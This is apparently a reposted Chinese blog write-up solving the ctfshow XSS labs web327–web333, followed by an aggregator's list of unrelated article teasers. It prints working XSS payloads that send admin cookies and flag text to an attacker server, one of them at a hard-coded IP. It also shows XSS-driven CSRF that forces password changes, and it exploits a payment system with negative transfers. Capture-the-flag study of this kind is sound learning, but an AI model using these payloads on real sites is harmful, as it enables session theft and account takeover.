ctfshow--xss靶场web327-web333(一命速通不了的靶场)

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

web327

打开页面是一个写信页面。

这里题目暗示不明显。

这里是要给admin写信,让他触发我们的xss。(不看解析不知道有个admin用户)

payload:

<svg οnlοad=window.location.href='http://xss平台地址/index.php?c='+document.cookie;>

接收cookie

web328

打开界面如下

思路如下

如果这里不是xss靶场的话,这里得考虑各种注入,xss,未授权,爆破,越权等一大堆漏洞。

但是这里是xss靶场

那么我们就考虑后台有个地方能看用户账号密码,所以我们注册一个带有xss的账号即可。

注册页面如下

用script即可,一命速通payload低配版没成功,高级版没尝试。

直接上payload:

<script>window.location.href='http://xss平台地址/blue/index.php?c='+document.cookie;</script>

 密码看不着就不放密码上了,放到用户名上。

拿到cookie。

然后用他的cookie登录进去,看信息。

这里有个大坑。

你的payload会跳转地址,那么你点进去后台就会被你自己的payload给打掉。

解决思路:

换个安全性强的浏览器试试

换个不跳转的payload试试

把js放到服务器上,然后远程加载js(标签中加上src)

我给你payload就是了:ctfshow{cf9e1490-bbfe-4d91-8d2c-b36f6c25c0ed}

web329

打开界面是跟328一样的。

同样的思路来一遍了。

但是你用同样的方法会发现进去会提示你不是管理员。

原因就是凭据失效。

你需要在很短的时间内完成所有的事情。

所以你需要用js代码,当对方触发时要让他把页面内容发过来。

这串代码是对方页面中寻找有关flag相关的消息发送到我们这里。

$('.laytable-cell-1-0-1').each(function(index,value){      //获取标签下的值(flag)if (value.innerHTML.indexOf('ctf'+'show'+'{')>-1){         //读取带有ctf、show、{ 的关键字window.location.href='http://182.92.86.16:9004/blue/index.php?c='+value.innerHTML;     //发送到自己的服务器}
});

web330

这一关有点像xss配合csrf进行钓鱼的操作了。

这一关打开发现多了一个密码修改的界面


cookie失效,直接找flag被过滤。

修改密码的数据包是访问这个地址,而且还贼简单就一个参数。

那么我们的思路就可以让管理员触发xss访问这个地址然后触发密码更改。

我们登录进去看flag。

注册的时候用这个payload

window.location.href='http://127.0.0.1/api/change.php?p=123';

让他访问自己的这个地址改密码为123
然后咱直接进去就行了。

web331

界面跟上面的都是一样的。

看看这个数据包是什么样子。

跟上一个差不多,不过这个变成了post请求。

那么创建的账号这样搞就好。

$.ajax ({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});

web332

这关多了不少东西。

 多了一个money系统。

修改密码依旧是post

但是好像给过滤了,无法改密码。

看看金额。

每次注册给5元。

弱智的方法

批量注册,批量发送转账数据包到一个账户中。

但是这个肯定咱不想干,太麻烦。

然后测试发现可以给自己汇款,而且金额是增加的。

稍微聪明点方法

这里又出现玩法了,类似于爆破疯狂给自己汇款即可。

但是咱是个懒虫,还是不想干。

最聪明的方法

金额可以汇款负数,那么咱们就是纯增加了。

现在有钱人我们直接买就行了。

 web333

最后一关打完下班

当然这关还可以自己给自己转账。爆破即可

 直接爆

有钱人,买了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/58641.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

法律文件智能识别:免费OCR平台优化数字化管理

一、系统概述 在法律行业&#xff0c;纸质文件的数字化需求日益迫切&#xff0c;合同、判决书、协议等文件的管理成为法律部门的一大难题。传统手动输入不仅耗时&#xff0c;且易出错。思通数科的OCR识别平台应运而生&#xff0c;以其开源、免费的特性为法律文档管理提供了智能…

Flutter-Engine 的定制实践:Text 绘制流程浅析及自定义underline的间距

前言 最近工作中处理的文本相关的内容较多&#xff0c;不论是刁钻的需求还是复杂的问题&#xff0c;最终都会引向一点“Flutter中的文本是如何绘制的&#xff1f;”。 这里我将以“调整下划线与文字的间距”为切入点并结合自定义Engine&#xff0c;记录一下我的个人分析和实践…

“基金申请精要:国自然基金撰写与SCI发表“

国自然基金项目撰写技巧与ChatGPT融合应用 随着社会经济发展和科技进步&#xff0c;基金项目对创新性的要求越来越高。国家级和省级等各类项目的申请层出不穷&#xff0c;项目书的撰写几乎占据了申请人的全年时间。申请人既需要提出独特且有前瞻性的研究问题&#xff0c;具备突…

java的依赖注入

java的依赖注入是个什么东西&#xff1f; 计算机专业相关知识2024-08-07 17:26河北 摘要 •帮你速读文章内容 java中的依赖注入&#xff08;Dependency Injection, DI&#xff09;是一种软件设计模式&#xff0c;用于减少代码间的耦合度。它允许一个对象&#xff08;被依赖的…

别再为质量问题头疼了,六西格玛黑带培训来救场!

六西格玛&#xff0c;这一源自摩托罗拉的先进质量管理理念&#xff0c;以其严谨的数据分析、持续的流程改进和追求卓越的核心价值&#xff0c;在全球范围内赢得了广泛的认可与应用。而六西格玛黑带&#xff0c;作为这一体系中的精英&#xff0c;不仅掌握了深厚的统计学知识&…

深度学习基础知识-Batch Normalization(BN)超详细解析

一、背景和问题定义 在深层神经网络&#xff08;Deep Neural Networks, DNNs&#xff09;中&#xff0c;层与层之间的输入分布会随着参数更新不断发生变化&#xff0c;这种现象被称为内部协变量偏移&#xff08;Internal Covariate Shift&#xff09;。具体来说&#xff0c;由…

优雅的LUA数据记录方法-serpent序列化+LUA Table

目录 简述如何集成&#xff1f;如何使用序列化 反序列化 参考 简述 项目里需要使用LUA脚本将数据记录到文件&#xff0c;要方便的增加、查找、删除&#xff0c;要方便的加载与存回。 使用序列化/反序列化 lua table可以很容易实现这些功能。 序列化将table转换为字符串 反序列…

2024双11海外购物新选择,逆向代购商家的营销利器

各大电商平台早已蓄势待发&#xff0c;迎接双11这场年度消费盛宴。与往年相比&#xff0c;今年的双11筹备工作启动得更早&#xff0c;国庆假期刚一结束&#xff0c;各大平台便进入了紧张的筹备阶段。对于遍布全球的海外购物者而言&#xff0c;无论是热衷于探索中国文化的外国人…

Cyber​​Panel upgrademysqlstatus 远程命令执行漏洞(QVD-2024-44346)

0x01 产品简介 CyberPanel是一个开源的Web控制面板,它提供了一个用户友好的界面,用于管理网站、电子邮件、数据库、FTP账户等。CyberPanel旨在简化网站管理任务,使非技术用户也能轻松管理自己的在线资源。 0x02 漏洞概述 该漏洞源于upgrademysqlstatus接口未做身份验证和…

【万户软件-注册安全分析报告-无验证方式导致安全隐患】

前言 由于网站注册入口容易被黑客攻击&#xff0c;存在如下安全问题&#xff1a; 1. 暴力破解密码&#xff0c;造成用户信息泄露 2. 短信盗刷的安全问题&#xff0c;影响业务及导致用户投诉 3. 带来经济损失&#xff0c;尤其是后付费客户&#xff0c;风险巨大&#xff0c;造…

大舍传媒:海外发稿传统新闻媒体发布新闻稿与门户媒体宣发的区别?

大舍传媒&#xff1a;海外发稿传统新闻媒体发布新闻稿与门户媒体宣发的区别&#xff1f; 在当今全球化的信息时代&#xff0c;新闻报道的传播渠道日益多元化&#xff0c;企业和个人在进行海外发稿时&#xff0c;往往面临着在传统新闻媒体和门户媒体之间的选择。那么&#xff0…

【在Linux世界中追寻伟大的One Piece】Socket编程TCP

目录 1 -> TCP socket API 2 -> V1 -Echo Server 2.1 -> 测试多个连接的情况 1 -> TCP socket API socket()&#xff1a; socket()打开一个网络通讯端口&#xff0c;如果成功的话&#xff0c;就像open()一样返回一个文件描述符。应用程序可以像读写文件一样用r…

NCCL安装(Ubuntu等)

目录 一、NCCL的定义二、安装NCCL的原因1、加速多GPU通信2、支持流行的深度学习框架3、提高计算效率4、易于使用和集成5、可扩展性 三、NCCL安装方法1、下载安装包2、更新APT数据库3、使用APT安装libnccl2包&#xff0c;另外&#xff0c;如果需要使用NCCL编译应用程序&#xff…

PostgreSQL的学习心得和知识总结(一百五十七)|新的 COPY 选项 LOG_VERBOSITY

目录结构 注&#xff1a;提前言明 本文借鉴了以下博主、书籍或网站的内容&#xff0c;其列表如下&#xff1a; 1、参考书籍&#xff1a;《PostgreSQL数据库内核分析》 2、参考书籍&#xff1a;《数据库事务处理的艺术&#xff1a;事务管理与并发控制》 3、PostgreSQL数据库仓库…

Spring Boot 配置文件详解与最佳实践

目录 前言1. 配置文件的作用2. Spring Boot 主要配置内容2.1 Actuator 配置2.2 缓存配置2.3 核心配置2.4 数据库与数据迁移配置2.5 开发工具配置2.6 Docker Compose 配置2.7 JSON 配置2.8 安全配置 3. 多个配置文件的处理方法3.1 使用 Profile 文件区分环境3.2 结合优先级加载配…

【05-多处理器编程入门到放弃】课堂代码调试

lecture05是并发的第一节课。主要讲了入门&#xff08;两个API&#xff0c;create和join&#xff09;和放弃&#xff08;原来很自然的串行想法&#xff09; 并发线程模型最小线程库线程自问自答11思考题&#xff1a;3个T_sum线程&#xff0c;sum的结果最小是多少&#xff1f;补…

探索Python文档自动化的奥秘:揭开docxtpl库的神秘面纱

文章目录 探索Python文档自动化的奥秘&#xff1a;揭开docxtpl库的神秘面纱1. 背景介绍2. 库简介3. 安装指南4. 基础函数介绍5. 实际应用场景6. 常见问题及解决方案7. 总结 探索Python文档自动化的奥秘&#xff1a;揭开docxtpl库的神秘面纱 1. 背景介绍 在日常工作中&#xf…

Web大学生网页作业成品——家乡广州介绍设计与实现(HTML+CSS)(5个页面)

&#x1f389;&#x1f389;&#x1f389; 常见网页设计作业题材有**汽车、环保、明星、文化、国家、抗疫、景点、人物、体育、植物、公益、图书、节日、游戏、商城、旅游、家乡、学校、电影、动漫、非遗、动物、个人、企业、美食、婚纱、其他**等网页设计题目, 可满足大学生网…

【信息安全设计】系统安全设计方案,系统安全保护设施设计实施方案(Word原件)

1.1 总体设计 1.1.1 设计原则 1.2 物理层安全 1.2.1 机房建设安全 1.2.2 电气安全特性 1.2.3 设备安全 1.2.4 介质安全措施 1.3 网络层安全 1.3.1 网络结构安全 1.3.2 划分子网络 1.3.3 异常流量管理 1.3.4 网络安全审计 1.3.5 网络访问控制 1.3.6 完整性检查 1.…